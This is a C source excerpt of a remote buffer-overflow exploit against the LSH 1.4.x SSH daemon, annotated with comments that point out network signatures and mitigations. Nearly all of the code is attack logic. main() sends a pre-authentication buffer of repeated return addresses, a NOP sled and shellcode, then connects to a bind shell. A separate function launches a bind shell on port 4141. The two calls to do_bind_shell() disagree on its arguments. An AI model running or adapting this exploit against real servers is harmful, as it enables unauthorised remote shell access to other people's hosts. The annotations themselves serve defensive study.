/*
 * Fetch the payload's environment path, report it on stdout, and pass it to
 * do_bind_shell() together with the fixed port 4141.
 *
 * prepare_payload() and do_bind_shell() are defined outside this excerpt.
 * The returned string is released with free() here, so it is presumably
 * heap-allocated by prepare_payload() -- confirm against its definition.
 *
 * Defensive reading: the port (4141) and the stdout message are hard-coded,
 * so both are stable indicators to look for in network monitoring and in
 * captured process output when triaging a host where this code has run.
 */
void drop_payload()
{
    char *payload_env = prepare_payload();

    printf("will launch a shell with this environment: %s\n", payload_env);
    do_bind_shell(payload_env, 4141);

    /* This function owns the string and releases it once the helper returns. */
    free(payload_env);
}
/*
 * Command-line driver of a proof-of-concept against an SSH daemon; the banner
 * string names "LSH 1.4.x". The function has no declared return type
 * (implicit int, pre-C99 style).
 *
 * Flow, as visible in this block:
 *   1. Parse options: -t <host>, -T <index into targets[]>, -h (usage and
 *      platform list).
 *   2. Resolve the host and connect through connect_to_host(SSH_PORT).
 *   3. Read once from the peer with my_recv().
 *   4. Fill the global buffer buf and send it with my_send().
 *   5. Close the socket, wait via my_sleep(), then call do_bind_shell().
 *
 * host, useTarget, targets, usage, buf, shellcode, hostStruct and the helper
 * functions are defined outside this excerpt.
 *
 * Defensive reading:
 *   - On the wire this is a single newline-terminated message sent right
 *     after the server's first data is read: one machine word repeated many
 *     times, followed by a run of 0x90 bytes and a payload. Long repeated-word
 *     and 0x90 runs in pre-authentication SSH traffic are a pattern that
 *     network signatures can key on.
 *   - The return address comes from a per-platform table (targets[].retAddr),
 *     i.e. the technique depends on a predictable memory layout. Address-space
 *     randomisation and non-executable data pages are designed to break that
 *     assumption; running a fixed lshd release removes the flaw itself (the
 *     fixed version is not stated on this page).
 */
main(int argc, char **argv)
{
    int ch, i, targetSock;
    unsigned long *retPtr;
    char *charRetPtr;

    printf("LSH 1.4.x (others?) exploit by Haggis ([email protected])\n\n");

    /* Option parsing: -t and -T take an argument, -h takes none. */
    while((ch=getopt(argc, argv, "t:T:h"))!=-1) {
        switch(ch) {
        case 't':
            /*
             * Copies at most SIZ-1 bytes. strncpy() does not terminate the
             * destination on truncation, so this presumably relies on host
             * being a zero-initialised buffer of SIZ bytes -- confirm.
             */
            strncpy(host, optarg, SIZ-1);
            break;
        case 'T':
            /* Index into targets[]; atoi() reports no conversion errors. */
            useTarget=atoi(optarg);
            break;
        case 'h':
        default:
            /* Print usage and every targets[] entry up to the NULL platform
             * sentinel, then exit. */
            printf("%s\n",usage);
            printf("Available platforms:\n");
            for(i=0;targets[i].platform;i++)
                printf(" %2d. %s\n", i, targets[i].platform);
            printf("\n");
            exit(0);
            break;
        }
    }

    /* A host is mandatory. */
    if(host[0]=='\0') {
        printf("[*] You must specify a host! Use -h for help\n");
        exit(1);
    }

    /* hostStruct is not used again in this block; presumably
     * connect_to_host() reads it -- confirm. */
    if((hostStruct=gethostbyname(host))==NULL) {
        printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
        exit(1);
    }

    if((targetSock=connect_to_host(SSH_PORT))==-1) {
        printf("[*] Coulnd't connect to host %s\n", host);
        exit(1);
    }

    /* One read from the peer before anything is sent (presumably the
     * server's version banner -- my_recv() is not visible here). */
    my_recv(targetSock);

    printf("[-] Building exploit buffer...\n");

    /* First region of buf: the selected target's retAddr, written
     * EXPLOIT_BUF_SIZE/4 times through an unsigned long pointer. */
    retPtr=(unsigned long *)buf;
    for(i=0;i<EXPLOIT_BUF_SIZE/4;i++)
        *(retPtr++)=targets[useTarget].retAddr;

    /* Second region: 0x90 filler bytes (the x86 single-byte no-op, matching
     * the NOPS_LEN name), NOPS_LEN minus the payload length of them. */
    charRetPtr=(unsigned char *)retPtr;
    for(i=0;i<NOPS_LEN-strlen(shellcode);i++)
        *(charRetPtr++)=(unsigned long)0x90;

    /* Third region: the payload, then '\n' and a terminating NUL. */
    memcpy(charRetPtr, shellcode, strlen(shellcode));
    *(charRetPtr+strlen(shellcode))='\n';
    *(charRetPtr+strlen(shellcode)+1)='\0';

    printf("[-] Sending exploit string...\n");
    my_send(targetSock, buf);
    close(targetSock);

    /* Pause before the follow-up connection; the unit of the argument
     * depends on my_sleep(), which is not visible here. */
    printf("[-] Sleeping...\n");
    my_sleep(100000);

    /* Second connection attempt. do_bind_shell() is called without arguments
     * here; its definition is outside this excerpt. */
    printf("[-] Connecting to bindshell...\n");
    if(do_bind_shell()==-1)
        printf("[*] Could not connect to %s - the exploit failed\n", host);

    exit(0);
}